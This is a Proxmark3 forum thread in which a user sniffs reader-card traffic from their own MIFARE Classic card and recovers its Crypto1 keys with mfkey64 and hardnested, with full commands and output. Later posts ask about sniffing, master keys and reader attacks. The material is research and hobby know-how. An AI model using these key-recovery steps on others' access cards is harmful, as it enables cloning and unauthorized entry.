Proxmark3 community
Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
You are not logged in.
Announcement
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
#1 2017-08-25 07:41:14
- Tatka
- Contributor
- From: Czech rep., EU
- Registered: 2017-08-21
- Posts: 21
[solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Hello,
I had the opportunity of Snoop Mifare communication. I am looking for the key of my tag, but when I enter 'hf sheet 14a' I see only the UID tag and then just CRC!
My tag is MIFARE CLASSIC 1k | Plus 2k SL1 , UID:bbbe991d . Is there an antenna error?
I think it's unlikely. Maybe the signal is too strong or weak. How can I sniff TAG and Reader communication?
Where am I making a mistake?
Perhaps this is someone familiar and able to advise.
Thank you.
proxmark3> hw version
Prox/RFID mark3 RFID instrument
bootrom: /-suspect 2015-11-19 10:08:02
os: master/v3.0.1-71-g5c814c3-suspect 2017-08-23 21:35:43
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2017/07/13 at 08:44:13
uC: AT91SAM7S512 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 512K bytes. Used: 198383 bytes (38%). Free: 325905 bytes (62%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memoryproxmark3> hf tune
#db# Measuring HF antenna, press button to exit
#db# 31727 mV
#db# 31727 mV
#db# 31727 mVproxmark3> hf search
UID : bb be 99 1d
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Valid ISO14443A Tag Found - Quiting Searchproxmark3> hf 14a snoop
#db# COMMAND FINISHED
#db# maxDataLen=3, Uart.state=0, Uart.len=1
#db# traceLen=39293, Uart.output[0]=00000026proxmark3> hf list 14a
Recorded Activity (TraceLen = 39293 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
0 | 192 | Tag | 01 | |
115456 | 115648 | Tag | 01 | |
139200 | 139584 | Tag |00! | |
162368 | 164736 | Tag | 04 00 | |
187072 | 189440 | Tag | 04 00 | |
209104 | 210000 | Tag | 04 | |
255824 | 256464 | Tag | 04 | |
279952 | 280144 | Tag | 01 | |
...
7431216 | 7433584 | Tag | 04 00 | |
7449792 | 7452160 | Tag | 04 00 | |
7459904 | 7465152 | Tag | bb be 99 1d 01 | |
7490752 | 7493120 | Tag | 04 00 | |
7500864 | 7506688 | Tag | bb be 99 1d 81 | |
7522752 | 7526272 | Tag | 08 b6 dd | |
8923296 | 8927968 | Tag | 05 a9 bc 71 | |
8940960 | 8945632 | Tag |c6! a6 05 11 | |
8955424 | 8976224 | Tag |76! 08 49! c2 b3 43! a6 53! 41 6a! eb! 4f db e6! d0! 28! | |
| | |b9! 36 | !crc|
8992048 | 8996784 | Tag | 15 37! 5a ac! | |
9009712 | 9014384 | Tag |ac! a5 87! 86! | |
9023408 | 9044208 | Tag | 52 79! 1d e9 04! 64! 80! 25 15! e9 09! c1! 67 61! 34 45! | |
| | |4a! 58! | !crc|
9053872 | 9074736 | Tag | c3 50 12 1f! de! f0! 23 8b! 33! 75 01! 1a 05 6c 02! 90! | |
| | |e2! 44! | !crc|
9084336 | 9105200 | Tag | 69 e6 d7 ca aa 24! 69 64! 4e! bb b0! 82! 97 75 31! cc | |
| | |d7! df | !crc|
9123632 | 9128368 | Tag |28! 9b 83 f1 | |
9141296 | 9145968 | Tag |0c! 72! 45! 0b! | |
9154992 | 9175792 | Tag |26! 26! a4! a0 3a e4 9e! 1b! df e9 0d 1b 0a! 39 2c! 7a! | |
| | | 8c 8f! | !crc|
9192384 | 9197056 | Tag |ce! 0c! b2 bf! | |
9210048 | 9214720 | Tag |3b! 3d! 25! fe! | |
9224512 | 9245376 | Tag |81! 0f! ae a8 39 64 88 f2! d0! b8! 73! 8c! 66! 8b! c9 3b! | |
| | | 1b 77! | !crc|
9254976 | 9275840 | Tag | 65 76 19! ac! 3b! b8 c0! 9b ff! 49 21! f5 98 1f 09 3b! | |
| | |7f! 9f! | !crc|
9285440 | 9306304 | Tag |63! 60 d6 7a! 63! 47! 9d 2b! 43 bf! aa! 35! 5c! 50! a7 5a! | |
| | |2c! a5! | !crc|
9453264 | 9457936 | Tag | 4d fb! ab! dd | |
9470928 | 9475664 | Tag |57! 78! 98 d0 | |
9484624 | 9505488 | Tag |1a! f2 d3! d8 5e! f0! 2d 4e 7d! f2! 8c! 8a! 32! 2a! 60 52 | |
| | | 0b 31 | !crc|
9521232 | 9525968 | Tag | e3 7a! 1c! 16 | |
9538896 | 9543632 | Tag |2b! 2c 62! c1 | |
9552592 | 9573392 | Tag | cd 3e ae 15! 25! b4 88! 5c fa! da fc! 4f 26! ce! 87! 5d! | |
| | |ba! ea! | !crc|
9583056 | 9603920 | Tag |c9! 3b! 5d f3! e4! 62 bb! ec a3 d8! f0 12! 4a! 36 df fd! | |
| | | 55 a3! | !crc|
9613536 | 9634336 | Tag |8d! 2f 9b 13! 39! d4 e3 88 c4 35! 7d 6e! f8 8a! 52! 83 | |
| | |59! d1 | !crc|
9653344 | 9658080 | Tag |f6! 42 e9 dc | |
9671136 | 9675808 | Tag |f8! 1c! 06 2e | |
9685600 | 9706400 | Tag | 10 86! f9 f8! 29! f6 ae! 49! b2 61 7c! 1a a4! 16! cd! 0c! | |
| | |99! 7d | !crc|
15347328 | 15352064 | Tag |2e! fc! fa da | |
15364992 | 15369664 | Tag | 9a 1f e0! 55 | |
15378688 | 15399552 | Tag |83! 53! 76! 14 31! 88! 27! b6 43! 19 9c d6! a1! 42! 56! c1! | |
| | |84! 6f! | !crc|
15417088 | 15421760 | Tag |46! ff! 5e! 1e | |
15434752 | 15439424 | Tag | 46 1d! 25 15! | |
15449216 | 15470080 | Tag |35! f6! 20 4d e3 db! 29! d1! 25! f7! 35! 95! de! a3! 84! 43 | |
| | |e5! fe | !crc|
15486736 | 15491408 | Tag |d2! a8 92! 33 | |
15504400 | 15509136 | Tag |f3! 60 06! a1 | |
15518608 | 15539472 | Tag | d8 b9! e5! 02! f1! 4a d7 81 f0 6f! e2 4e 41! 35 b1 00! | |
| | |d5! 5c! | !crc|
15556112 | 15560848 | Tag |75! d4! 14! 91 | |
15573776 | 15578448 | Tag | c6 df! ee! 41 | |
15587472 | 15608272 | Tag |86! 13! ed! 0b! e3! b0! d4! fe c5! ac 3d! 00 99! f9! ba! b2! | |
| | |3f! f9 | !crc|
15624976 | 15629648 | Tag | 4d 85 98 d8 | |
15643536 | 15648208 | Tag |b7! 7b bb! 48 | |
15657232 | 15678032 | Tag | 6d ce! b5 e7! e4! af! 33! 80 ab! 93 3d 11! e0 c9 53! 15 | |
| | | 97 ff | !crc|
15694752 | 15699488 | Tag |0e! 28 70 92 | |
15712544 | 15717280 | Tag | be c6! 0c 7b! | |
15726240 | 15747040 | Tag |34! c1 a2 cd! 85 57! 20! 11 d8! ae! 2d! 63 63! 77! 42! 6b | |
| | | 2f 0b! | !crc|
15764640 | 15769376 | Tag |99! 03 19 4b! | |
15782304 | 15786976 | Tag |d9! 6d! 76 1e | |
15796000 | 15816800 | Tag |8a! 19! 25 5d! ef! 20 f1! 3b e3! 9d 60 ec 62 47 f3 a2! | |
| | | 5c 98! | !crc|
15834400 | 15839136 | Tag | 4f e4! 2c 4e! | |
15852064 | 15856736 | Tag | 35 b0 26 43! | |
15865760 | 15886624 | Tag | 8e 17! 54! 6e 30 0e a1! fb! f2! 25 0c a0 21! 5f ef ed! | |
| | |33! 09! | !crc|
15904176 | 15908912 | Tag |a2! 53! 54 95! | |
15921840 | 15926576 | Tag | f2 05! d8! ce | |
15935536 | 15956336 | Tag |0e! 23 a4 13! 83 e5 7d! 0a! 09! f4! bf! 46! cb 2f! 65 b2 | |
| | | e2 6c | !crc|
15973936 | 15978608 | Tag |b7! 25! 92! 3f | |
15991600 | 15996336 | Tag |0a! 32 aa! b8! | |
16006064 | 16026864 | Tag |17! da 64 ed 0b! 8a! 80! 53! 21! 5c cb 05 7f! 6a! d8 92! | |
| | |48! d5! | !crc|
16043568 | 16048304 | Tag |1a! 22 70 4e! | |
16061232 | 16065904 | Tag | 4b be! 67! ea! | |
16074928 | 16095728 | Tag | 0c 31 56 ec! 35! 99 0a 15 5d fc! ca! 77 79! 0c! 78 e8! | |
| | |23! 10!
(more)Last edited by Tatka (2017-08-28 17:45:49)
Offline
#2 2017-08-25 11:03:32
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Yes, your trace doesn't show the READER parts. try different positions with your antenna.
You could try the sim command to try getting the key out if it. Read the help text for instructions, or here on forum, search is your friend.
hf 14a sim h Because you are trying to sniff/snoop a standard ISO14443a transaction, you will only get those parts out from your reader.
Mifare uses its own protocol about ISO14443a, luckily there is a mifare sniff command.
hf mf sniff
hf list 14aOffline
#3 2017-08-27 13:34:18
- Tatka
- Contributor
- From: Czech rep., EU
- Registered: 2017-08-21
- Posts: 21
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Hello. Thank you for your advice.
proxmark3> hf 14a sim 1 bbbe001d x
Emulating ISO/IEC 14443 type A tag with 4 byte UID (bbbe001d)
#db# 1000 commands later...
#db# 0 0 3e8
proxmark3> hf list 14a
Recorded Activity (TraceLen = 21000 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
0 | 1056 | Rdr | 26 | | REQA
2228 | 4596 | Tag | 04 00 | |
11776 | 12832 | Rdr | 26 | | REQA
14004 | 16372 | Tag | 04 00 | |
22912 | 23968 | Rdr | 26 Worked but found no key. I was kicked right after the first two bytes. I used
Hf mf sniffAnd now I see this communication.
proxmark3> hf mf dbg 1
#db# Debug level: 1
proxmark3> hf mf sniff
-------------------------------------------------------------------------
Executing command.
Press the key on the proxmark3 device to abort both proxmark3 and client.
Press the key on pc keyboard to abort the client.
-------------------------------------------------------------------------
......................................>
received trace len: 17546 packages: 35
tag select uid:bb be 99 1d atqa:0x0004 sak:0x08
RDR(0):61 03 b6 50
TAG(1):6c cd eb b1
RDR(2):8e 8d 5a 92 66 bd 68 f9
TAG(3):cd 9f ac 2a
RDR(4):97 35 19 fd
TAG(5):34 93 34 80 34 c9 5f 98 b4 e2 5f af ea bb 67 5d 22 3f
RDR(6):f6 11 65 23
TAG(7):bf f1 0d 4b
RDR(8):9a 87 29 e9 12 81 66 b7
TAG(9):6b 1f 6c cb
RDR(10):21 5d 28 3b
TAG(11):cc fe 84 de 89 7f 3e 9a 08 87 0e 2e ac a4 49 72 24 d2
RDR(12):48 d5 f1 70
TAG(13):f5 e6 d7 07 a8 eb b4 b0 00 e6 b2 05 da a3 a9 99 9e 11
RDR(14):99 d7 5f 8d
TAG(15):91 d3 43 89 c7 ed 31 29 e5 b4 1c dc 62 be 9f 8b a9 3a
RDR(16):12 01 8a 6b
TAG(17):f6 92 02 19
RDR(18):a5 9a 2a 47 6e f4 7e e3
TAG(19):e3 7e 75 04
RDR(20):ab f4 e0 59
TAG(21):31 4c 0a 33 9b 12 d6 8c ae 8e e9 73 5d df 5e f2 7e 96
RDR(22):dd a8 5e 18
TAG(23):2d ac db 8e
RDR(24):89 e7 a7 84 6d 3b 89 0d
TAG(25):12 b5 49 ad
RDR(26):ac 1b c8 29
TAG(27):df 9e 8c e0 96 be a5 f7 75 00 4d 9d e8 8d 46 d0 77 6c
RDR(28):03 dd bf 7e
TAG(29):fb 00 00 22 53 ef 87 21 c1 72 04 7b 6d 85 b2 03 71 7b
RDR(30):52 8e e0 8e
TAG(31):b7 ac 19 6f 78 81 d0 1f d2 14 37 9d 9c 9f b9 49 5a c6
RDR(32):99 36 c9 15
TAG(33):1d e6 42 ba
RDR(34):32 9b 3a d5 6b 63 c4 db
TAG(35):98 18 ee 2c
RDR(36):38 c9 8b f4
TAG(37):50 2a ac 42 0d 7f 74 54 4a 1f 67 af 63 7b fa 5d 81 6c
RDR(38):6b 95 25 e3
TAG(39):ba 07 e9 57
RDR(40):e5 8d 94 05 01 7e a1 81
TAG(41):37 02 4c 25
RDR(42):16 77 fd 1b
TAG(43):84 7e a2 7f 1a 9e 2f 25 3a f3 f6 aa cf 66 3f 24 d5 1e
RDR(44):e3 0f 9d 32
TAG(45):a3 ba e7 86 88 35 f3 7d 42 15 08 23 25 46 e5 d1 30 27
RDR(46):b6 1c e5 17
TAG(47):77 6b 3a fa 15 e8 1d 98 a8 f4 54 df 5d a6 c6 db c2 f8
RDR(48):33 87 f1 7e
TAG(49):1e 2f 79 89
RDR(50):89 4c 87 78 eb a8 07 48
TAG(51):69 a7 7d 9f
RDR(52):bc c1 cf 30
TAG(53):4d b7 17 fe e1 56 54 f3 2f d8 e6 52 90 76 6c 69 7b 4a
RDR(54):bc 01 6a 74
TAG(55):3c 25 c5 d5
RDR(56):cd 0d c1 41 19 27 e8 cb
TAG(57):38 2f 34 23
RDR(58):54 36 8a 59
TAG(59):5b 35 6d c0 97 78 2e df b0 0e 87 1d 75 60 20 35 5c 03
RDR(60):a7 d7 58 8c
TAG(61):b6 6f 2d ab
RDR(62):3e 25 65 ea f7 28 c7 e0
TAG(63):5f c0 32 45
RDR(64):47 d3 3f e6
TAG(65):66 ed 44 b8 7f eb f5 49 9d 99 eb 00 22 b7 ba 8c df 82
RDR(66):85 42 ef 37
TAG(67):01 4c 58 8c
RDR(68):18 11 f0 62 f8 2e 81 3f
TAG(69):fd 3f 8e b0
...The tag uses about more keys and I'm trying to find the right ones. So far, I found only one B valid key. He is only for zero sector where a key is used A=a0a1a2a3a4a5 OR B=1bacd1f05468
Other sectors are locked.
I use the parameters for Crypto1 as follows:
# ./mfkey64 bbbe991d 6ccdebb1 8e8d5a92 66bd68f9 cd9fac2a
MIFARE Classic key recovery - based on 64 bits of keystream
Recover key from only one complete authentication!
Recovering key for:
uid: bbbe991d
nt: 6ccdebb1
{nr}: 8e8d5a92
{ar}: 66bd68f9
{at}: cd9fac2a
LFSR successors of the tag challenge:
nt' : 149a0313
nt'': 3b6dbb00
Time spent in lfsr_recovery64(): 0.06 seconds
Keystream used to generate {ar} and {at}:
ks2: 72276bea
ks3: f6f2172a
Found Key: [1bacd1f05468]1bacd1f05468--> is valid for sektor 0 as key B
# ./mfkey64 bbbe991d bff10d4b 9a8729e9 128166b7 6b1f6ccb
MIFARE Classic key recovery - based on 64 bits of keystream
Recover key from only one complete authentication!
Recovering key for:
uid: bbbe991d
nt: bff10d4b
{nr}: 9a8729e9
{ar}: 128166b7
{at}: 6b1f6ccb
LFSR successors of the tag challenge:
nt' : 81299d2f
nt'': f5689194
Time spent in lfsr_recovery64(): 0.07 seconds
Keystream used to generate {ar} and {at}:
ks2: 93a8fb98
ks3: 9e77fd5f
Found Key: [8d8d7e26d663] 8d8d7e26d663 is not valid for any sector.
...
Now I do not know how to continue to read sector 1-15
I tried 'mfoc' but the new keys were not found
$ mfoc -k 1bacd1f05468 -k a0a1a2a3a4a5 -T 30 -P 500 -O dumpkeys.bin
The custom key 0x1bacd1f05468 has been added to the default keys
The custom key 0xa0a1a2a3a4a5 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): bb be 99 1d
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 1bacd1f05468] -> [\...............]
[Key: a0a1a2a3a4a5] -> [x...............]
[Key: ffffffffffff] -> [x...............]
[Key: a0a1a2a3a4a5] -> [x...............]
[Key: d3f7d3f7d3f7] -> [x...............]
[Key: 000000000000] -> [x...............]
[Key: b0b1b2b3b4b5] -> [x...............]
[Key: 4d3a99c351dd] -> [x...............]
[Key: 1a982c7e459a] -> [x...............]
[Key: aabbccddeeff] -> [x...............]
[Key: 714c5c886e97] -> [x...............]
[Key: 587ee5f9350f] -> [x...............]
[Key: a0478cc39091] -> [x...............]
[Key: 533cb6c723f6] -> [x...............]
[Key: 8fd0a4f256e9] -> [x...............]
Sector 00 - Found Key A: a0a1a2a3a4a5 Found Key B: 1bacd1f05468
Sector 01 - Unknown Key A Unknown Key B
Sector 02 - Unknown Key A Unknown Key B
Sector 03 - Unknown Key A Unknown Key B
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Unknown Key A Unknown Key B
Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
$_.
I'm a newbie and I have a lot to learn. There is no sky without clouds.
Last edited by Tatka (2017-08-28 00:05:00)
Offline
#4 2017-08-27 21:20:31
- Tatka
- Contributor
- From: Czech rep., EU
- Registered: 2017-08-21
- Posts: 21
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
I also tried the 'nested':
proxmark3> hf mf nested 1 0 B 1bacd1f05468 d
Testing known keys. Sector count=16
nested...
-----------------------------------------------
Tag isn't vulnerable to Nested Attack (random numbers are not predictable).What else can I do to crack the card?
Offline
#5 2017-08-28 03:26:36
- Dot.Com
- Contributor
- From: Hong Kong
- Registered: 2016-10-05
- Posts: 180
- Website
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Go and read up about hardnest and how it works. 
btw if you are unsure about the commands please feel free to type half the command.
Example: hf mf chk - will give you
Usage: hf mf chk <block number>|<*card memory> <key type (A/B/?)> [t|d] [<key (12 hex symbols)>] [<dic (*.dic)>]
* - all sectors
card memory - 0 - MINI(320 bytes), 1 - 1K, 2 - 2K, 4 - 4K, <other> - 1K
d - write keys to binary file
t - write keys to emulator memory
sample: hf mf chk 0 A 1234567890ab keys.dic
hf mf chk *1 ? t
hf mf chk *1 ? d
Hf mf hardnest - will give you
Usage:
hf mf hardnested <block number> <key A|B> <key (12 hex symbols)>
<target block number> <target key A|B> [known target key (12 hex symbols)] w s
or hf mf hardnested r [known target key]
Options:
w: Acquire nonces and write them to binary file nonces.bin
s: Slower acquisition (required by some non standard cards)
r: Read nonces.bin and start attack
sample1: hf mf hardnested 0 A FFFFFFFFFFFF 4 A
sample2: hf mf hardnested 0 A FFFFFFFFFFFF 4 A w
sample3: hf mf hardnested 0 A FFFFFFFFFFFF 4 A w s
sample4: hf mf hardnested r
Add the known target key to check if it is present in the remaining key space:
sample5: hf mf hardnested 0 A A0A1A2A3A4A5 4 A FFFFFFFFFFFF good that you are learning, keep practising.
Last edited by Dot.Com (2017-08-28 03:27:25)
Offline
#6 2017-08-28 17:45:12
- Tatka
- Contributor
- From: Czech rep., EU
- Registered: 2017-08-21
- Posts: 21
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
It works great. It's amazing. It's like magic
pm3 --> hf mf hardnested 0 B 1bacd1f05468 4 A
--target block no: 4, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 8 threads and AVX2 SIMD core | |
0 | 0 | Brute force benchmark: 1121 million (2^30.1) keys/s | 140737488355328 | 35h
1 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 35h
5 | 112 | Apply bit flip properties | 363263426560 | 5min
6 | 224 | Apply bit flip properties | 112237199360 | 2min
7 | 335 | Apply bit flip properties | 88805146624 | 79s
8 | 447 | Apply bit flip properties | 76838215680 | 69s
8 | 559 | Apply bit flip properties | 76532318208 | 68s
9 | 669 | Apply bit flip properties | 74550116352 | 67s
10 | 779 | Apply bit flip properties | 74550116352 | 67s
11 | 889 | Apply bit flip properties | 74550116352 | 67s
11 | 997 | Apply bit flip properties | 74550116352 | 67s
12 | 1106 | Apply bit flip properties | 74550116352 | 67s
13 | 1215 | Apply bit flip properties | 74550116352 | 67s
14 | 1324 | Apply bit flip properties | 74550116352 | 67s
15 | 1434 | Apply bit flip properties | 74550116352 | 67s
16 | 1541 | Apply bit flip properties | 74550116352 | 67s
16 | 1649 | Apply bit flip properties | 74550116352 | 67s
18 | 1759 | Apply Sum property. Sum(a0) = 64 | 21144940544 | 19s
18 | 1864 | Apply bit flip properties | 7027675648 | 6s
19 | 1970 | Apply bit flip properties | 7027675648 | 6s
20 | 2080 | Apply bit flip properties | 7877309440 | 7s
21 | 2186 | Apply bit flip properties | 7027675648 | 6s
22 | 2295 | Apply bit flip properties | 5142730752 | 5s
23 | 2295 | (1. guess: Sum(a8) = 0) | 5142730752 | 5s
23 | 2295 | Apply Sum(a8) and all bytes bitflip properties | 4239027712 | 4s
23 | 2295 | Brute force phase completed. Key found: 0a65cb3eb977 | 0 | 0s
pm3 -->Now I can play Proxmark again.
Thank you.
Offline
#7 2017-08-28 19:13:13
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Impressive numbers!
8 threads and Brute force benchmark: 1121 million (2^30.1) keys/s
Offline
#8 2017-08-29 13:40:36
- Tatka
- Contributor
- From: Czech rep., EU
- Registered: 2017-08-21
- Posts: 21
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
I was flashing a new firmware yesterday. I hope this number does not show any problem 
Offline
#9 2018-04-15 02:38:25
- rayway99
- Contributor
- Registered: 2018-04-08
- Posts: 20
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Hi sorry to piggyback on the old thread... let me know if i shld open a new thread
playing around the hf mf sniff / hf 14a snoop function, i encountered the following problems
1) in iceman v3.1.0 folk there is 'no hf mf sniff' command , is the mf sniff combined into 'hf 14a sniff' ?
pm3 --> hw version
[[[ Cached information ]]]
Proxmark3 RFID instrument
[ ARM ]
bootrom: iceman/master/ice_v3.1.0-787-g192aa9ab 2018-04-08 11:49:32
os: iceman/master/ice_v3.1.0-787-g192aa9ab 2018-04-08 11:49:37
[ FPGA ]
LF image built for 2s30vq100 on 2017/10/25 at 19:50:50
HF image built for 2s30vq100 on 2017/11/10 at 19:24:16
[ Hardware ]
--= uC: AT91SAM7S512 Rev B
--= Embedded Processor: ARM7TDMI
--= Nonvolatile Program Memory Size: 512K bytes, Used: 237727 bytes (45%) Free: 286561 bytes (55%)
--= Second Nonvolatile Program Memory Size: None
--= Internal SRAM Size: 64K bytes
--= Architecture Identifier: AT91SAM7Sxx Series
--= Nonvolatile Program Memory Type: Embedded Flash Memory
pm3 --> hf mf h
help This help
darkside Darkside attack. read parity error messages.
nested Nested attack. Test nested authentication
hardnested Nested attack for hardened Mifare cards
keybrute J_Run's 2nd phase of multiple sector nested authentication key recovery
nack Test for Mifare NACK bug
chk Check keys
fchk Check keys fast, targets all keys on card
decrypt [nt] [ar_enc] [at_enc] [data] - to decrypt snoop or trace
-----------
dbg Set default debug mode
rdbl Read MIFARE classic block
rdsc Read MIFARE classic sector
dump Dump MIFARE classic tag to binary file
restore Restore MIFARE classic binary file to BLANK tag
wrbl Write MIFARE classic block
setmod Set MIFARE Classic EV1 load modulation strength
-----------
sim Simulate MIFARE card
eclr Clear simulator memory block
eget Get simulator memory block
eset Set simulator memory block
eload Load from file emul dump
esave Save to file emul dump
ecfill Fill simulator memory with help of keys from simulator
ekeyprn Print keys from simulator memory
-----------
csetuid Set UID for magic Chinese card
csetblk Write block - Magic Chinese card
cgetblk Read block - Magic Chinese card
cgetsc Read sector - Magic Chinese card
cload Load dump into magic Chinese card
csave Save dump from magic Chinese card into file or emulator
ice collect Mifare Classic nonces to file2) when I tried with the official firmware (v3.0.1)
2.1) hf 14a snoop is capturing TAG only information ( i was using an Android TagInfo app to act as reader for ease purpose)
where info can be retrieved from hf list 14a / hf list mf
2.2) when using hf mf sniff, there is not info captured at all .. while the Android app is able to retrieve tag UID etc
(position : Android Phone <--1cm--> PM3 Easy <--1cm--> Test Tag (IC)
should I try with the FDI reader at the lift or sth wrong local in my setup?
proxmark3> hw version
[[[ Cached information ]]]
Prox/RFID mark3 RFID instrument
bootrom: master/v3.0.1-361-ge069547-suspect 2018-04-03 11:12:28
os: master/v3.0.1-361-ge069547-suspect 2018-04-03 11:12:31
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2017/10/27 at 08:30:59
uC: AT91SAM7S512 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 512K bytes. Used: 199639 bytes (38%). Free: 324649 bytes (62%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hf mf h
help This help
dbg Set default debug mode
rdbl Read MIFARE classic block
rdsc Read MIFARE classic sector
dump Dump MIFARE classic tag to binary file
restore Restore MIFARE classic binary file to BLANK tag
wrbl Write MIFARE classic block
chk Test block keys
mifare Read parity error messages.
hardnested Nested attack for hardened Mifare cards
nested Test nested authentication
sniff Sniff card-reader communication
sim Simulate MIFARE card
eclr Clear simulator memory block
eget Get simulator memory block
eset Set simulator memory block
eload Load from file emul dump
esave Save to file emul dump
ecfill Fill simulator memory with help of keys from simulator
ekeyprn Print keys from simulator memory
cwipe Wipe magic Chinese card
csetuid Set UID for magic Chinese card
csetblk Write block - Magic Chinese card
cgetblk Read block - Magic Chinese card
cgetsc Read sector - Magic Chinese card
cload Load dump into magic Chinese card
csave Save dump from magic Chinese card into file or emulator
decrypt [nt] [ar_enc] [at_enc] [data] - to decrypt snoop or trace
proxmark3> hf mf dbg 3
#db# Debug level: 3
proxmark3> hf mf sniff
-------------------------------------------------------------------------
Executing command.
Press the key on the proxmark3 device to abort both proxmark3 and client.
Press the key on pc keyboard to abort the client.
-------------------------------------------------------------------------
.#db# ISO14443A Timeout set to 1060 (10ms)
.......#db# Canceled by button.
#db# COMMAND FINISHED.
#db# maxDataLen=2, Uart.state=0, Uart.len=0
Done.
proxmark3> hf list mf
Recorded Activity (TraceLen = 0 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
proxmark3> hf list 14a
Recorded Activity (TraceLen = 0 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|Offline
#10 2019-02-28 09:22:13
- mike
- Member
- Registered: 2018-10-11
- Posts: 22
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
When i git the keys out off the reader and after that i used crypto 1 .But how you put the keys on a card after crypto 1 when i git keys out off the reader?
Offline
#11 2019-03-01 05:23:19
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
@mike don't hijack threads.
Offline
#12 2019-03-02 09:57:17
- mike
- Member
- Registered: 2018-10-11
- Posts: 22
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
I can not get out with the proxmark3.I try to make a master key but I can not. I also try to get info from the reader but I can not. I am new in this I am learning can someone helping me with that and explained me how?iceman can you help me out and what did you mean I'm dutch my english is not so good.
Offline
#13 2019-03-02 15:50:09
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Did you read the wiki? ]https://github.com/Proxmark/proxmark3/wiki its a good start.
Offline
#14 2019-03-02 17:49:04
- mike
- Member
- Registered: 2018-10-11
- Posts: 22
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Iceman I read it .i know how to clone.but I whant to make a masterkey out off a other valid key and allso the reader attack i whant to know .i search every where but can find nothing so can you help me out iceman
Offline
#15 2020-05-21 05:38:30
- Mohammad
- Contributor
- Registered: 2020-05-12
- Posts: 9
Re: [solved] Mifare Snoop -> only TAG, no READER, CRC! Only TAG. Why?
Thanks
Offline